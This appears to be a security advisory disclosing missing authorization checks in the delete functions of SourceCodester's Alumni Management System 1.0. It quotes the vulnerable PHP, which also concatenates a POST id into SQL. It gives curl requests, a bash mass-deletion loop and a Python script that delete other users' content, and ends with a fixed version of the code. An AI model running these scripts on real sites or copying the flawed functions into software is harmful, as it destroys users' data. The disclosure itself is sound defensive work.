# Alumni Management System 1.0 - Authorization Bypass in DELETE Operations ## Product Information **Product Name:** Alumni Management System **Vendor:** SourceCodester **Version:** 1.0 **Product Type:** Web Application (PHP/MySQL) --- ## Vulnerability Details ### Description Alumni Management System 1.0 contains a critical authorization bypass vulnerability in all DELETE operations. The application fails to verify ownership before allowing users to delete content, enabling any authenticated user to delete forum topics, career postings, comments, gallery items, and events created by other users, including administrators. The vulnerability exists because DELETE functions in `admin/admin_class.php` do not implement ownership validation checks before executing SQL DELETE statements. While the user interface conditionally displays delete buttons only to content owners, the backend AJAX endpoints accept DELETE requests from any authenticated user without verifying the relationship between the user and the content being deleted. ### Root Cause The vulnerability stems from missing authorization checks in five DELETE functions within `admin/admin_class.php`: 1. `delete_forum()` - Lines 341-346 2. `delete_career()` - Lines 320-325 3. `delete_comment()` - Lines 362-367 4. `delete_gallery()` - Lines 296-301 5. `delete_event()` - Lines 390-395 Each function follows the same vulnerable pattern: - Accepts content ID from POST parameter - Executes DELETE SQL statement directly - Returns success/failure without ownership verification ### CWE Classification **Primary:** CWE-862 - Missing Authorization **Secondary:** CWE-284 - Improper Access Control ### CVSS v3.1 Scoring **Base Score:** 8.1 HIGH **Vector String:** CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H **Metrics:** - Attack Vector (AV): Network - Exploitable remotely via HTTP requests - Attack Complexity (AC): Low - No special conditions required - Privileges Required (PR): Low - Any authenticated user account - User Interaction (UI): None - Fully automated exploitation - Scope (S): Unchanged - Impact limited to vulnerable component - Confidentiality (C): None - No information disclosure - Integrity (I): High - Can delete any content regardless of ownership - Availability (A): High - Mass deletion enables denial of service --- ## Affected Components ### File: admin/admin_class.php **Function 1: delete_forum() (Lines 341-346)** ```php function delete_forum(){ extract($_POST); $delete = $this->db->query("DELETE FROM forum_topics where id = ".$id); if($delete){ return 1; } } ``` **Function 2: delete_career() (Lines 320-325)** ```php function delete_career(){ extract($_POST); $delete = $this->db->query("DELETE FROM careers where id = ".$id); if($delete){ return 1; } } ``` **Function 3: delete_comment() (Lines 362-367)** ```php function delete_comment(){ extract($_POST); $delete = $this->db->query("DELETE FROM forum_comments where id = ".$id); if($delete){ return 1; } } ``` **Function 4: delete_gallery() (Lines 296-301)** ```php function delete_gallery(){ extract($_POST); $delete = $this->db->query("DELETE FROM gallery where id = ".$id); if($delete){ return 1; } } ``` **Function 5: delete_event() (Lines 390-395)** ```php function delete_event(){ extract($_POST); $delete = $this->db->query("DELETE FROM events where id = ".$id); if($delete){ return 1; } } ``` ### AJAX Endpoint: admin/ajax.php All DELETE operations are accessible through the AJAX controller without additional authorization: ```php if($action == "delete_forum"){ $save = $crud->delete_forum(); if($save) echo $save; } ``` --- ## Proof of Concept ### Prerequisites 1. Two user accounts (Attacker and Victim) 2. Victim creates content (forum topic, career posting, etc.) 3. Attacker obtains valid session cookie ### PoC 1: Delete Forum Topic **Scenario:** User A creates forum topic with ID=5. User B (attacker) deletes it. ```bash # Step 1: Attacker authenticates and obtains session curl -X POST 'http://target/admin/ajax.php?action=login' \ -H 'Content-Type: application/x-www-form-urlencoded' \ -d 'username=attacker&password=attacker123' \ -c cookies.txt # Step 2: Delete victim's forum topic curl -X POST 'http://target/admin/ajax.php?action=delete_forum' \ -H 'Content-Type: application/x-www-form-urlencoded' \ -b cookies.txt \ -d 'id=5' # Expected Response: 1 (Success) # Result: Victim's forum topic is permanently deleted ``` ### PoC 2: Delete Career Posting ```bash curl -X POST 'http://target/admin/ajax.php?action=delete_career' \ -H 'Cookie: PHPSESSID=attacker_session_id' \ -d 'id=TARGET_CAREER_ID' # Response: 1 # Impact: Job posting deleted, potential loss of recruitment opportunities ``` ### PoC 3: Mass Deletion Attack (DoS) ```bash #!/bin/bash # Mass delete all forum topics (Denial of Service) SESSION="attacker_session_id" for id in {1..100}; do curl -X POST "http://target/admin/ajax.php?action=delete_forum" \ -H "Cookie: PHPSESSID=$SESSION" \ -d "id=$id" & done wait echo "Mass deletion complete - Platform unusable" ``` ### PoC 4: Python Automation Script ```python #!/usr/bin/env python3 import requests TARGET = "http://target-site.com" SESSION_COOKIE = {"PHPSESSID": "attacker_session_id"} # Enumerate and delete all careers def mass_delete_careers(): for career_id in range(1, 100): response = requests.post( f"{TARGET}/admin/ajax.php?action=delete_career", cookies=SESSION_COOKIE, data={"id": career_id} ) if response.text == "1": print(f"[+] Successfully deleted career ID: {career_id}") else: print(f"[-] Failed to delete career ID: {career_id}") if __name__ == "__main__": mass_delete_careers() ``` --- ## Impact Analysis ### Technical Impact 1. **Data Destruction** - Permanent deletion of user-generated content - Loss of forum discussions, job postings, events, comments - No soft-delete or recovery mechanism 2. **Denial of Service** - Mass deletion renders platform unusable - Loss of community engagement - Destruction of institutional knowledge 3. **Audit Trail Compromise** - Deletions appear to come from content owners - No logging of actual deletion requester - Forensic analysis complicated ### Business Impact 1. **Reputation Damage** - Users lose trust in platform security - Alumni association credibility destroyed - Negative publicity 2. **Legal Liability** - Violation of data protection regulations - Potential lawsuits from affected users - GDPR/CCPA implications if user data deleted 3. **Operational Disruption** - Loss of recruitment/career services - Event coordination failures - Communication breakdown 4. **Financial Loss** - Recovery costs - Legal expenses - Loss of user subscriptions ### Real-World Attack Scenarios **Scenario 1: Competitor Sabotage** - Competitor creates account - Deletes all job postings from rival companies - Platform loses credibility in job market **Scenario 2: Disgruntled User** - Former member with grudge - Mass-deletes all forum topics - Destroys years of community discussions **Scenario 3: Ransomware-style Attack** - Attacker deletes all content - Demands payment for "recovery" - Even though data is permanently lost --- ## Exploitation Requirements **Authentication Required:** Yes - Any valid user account **Privileges Required:** Low - Regular user account sufficient **Attack Complexity:** Low - Simple HTTP POST requests **User Interaction:** None - Fully automated **Network Access:** Remote - Exploitable over internet --- ## Affected Versions **Confirmed Vulnerable:** Alumni Management System 1.0 **Potentially Vulnerable:** All versions (vendor has not released updates) --- ## Remediation ### Immediate Mitigation 1. **Disable DELETE Endpoints** - Temporarily disable AJAX delete actions - Restrict to administrator accounts only 2. **Implement WAF Rules** - Block suspicious patterns of delete requests - Rate limit delete operations per user ### Secure Code Implementation Replace all vulnerable DELETE functions with proper authorization: ```php function delete_forum(){ extract($_POST); // Step 1: Verify user is authenticated if(!isset($_SESSION['login_id'])){ return 0; } // Step 2: Retrieve content ownership information $check = $this->db->query( "SELECT user_id FROM forum_topics WHERE id = ".(int)$id ); if($check->num_rows == 0){ return 0; // Content does not exist } $row = $check->fetch_assoc(); // Step 3: Verify authorization (owner OR admin) if($row['user_id'] != $_SESSION['login_id'] && $_SESSION['login_type'] != 1){ return 0; // ACCESS DENIED } // Step 4: Safe to delete $delete = $this->db->query( "DELETE FROM forum_topics WHERE id = ".(int)$id ); // Step 5: Log the deletion $this->log_action('delete_forum', $id, $_SESSION['login_id']); return $delete ? 1 : 0; } ``` ### Comprehensive Fix Apply authorization checks to all five functions: 1. delete_forum() 2. delete_career() 3. delete_comment() 4. delete_gallery() 5. delete_event() **Implementation Steps:** 1. Add ownership verification query 2. Compare retrieved user_id with session login_id 3. Allow administrators (login_type = 1) to delete any content 4. Implement audit logging 5. Add input validation (cast ID to integer) 6. Implement soft-delete mechanism for recovery ## References 1. CWE-862: Missing Authorization https://cwe.mitre.org/data/definitions/862.html 2. OWASP Top 10 2021 - A01:2021 Broken Access Control https://owasp.org/Top10/A01_2021-Broken_Access_Control/ 3. Product Source Code https://www.sourcecodester.com/php/14877/alumni-management-system-php-free-source-code.html 4. CVSS v3.1 Calculator https://www.first.org/cvss/calculator/3.1 ---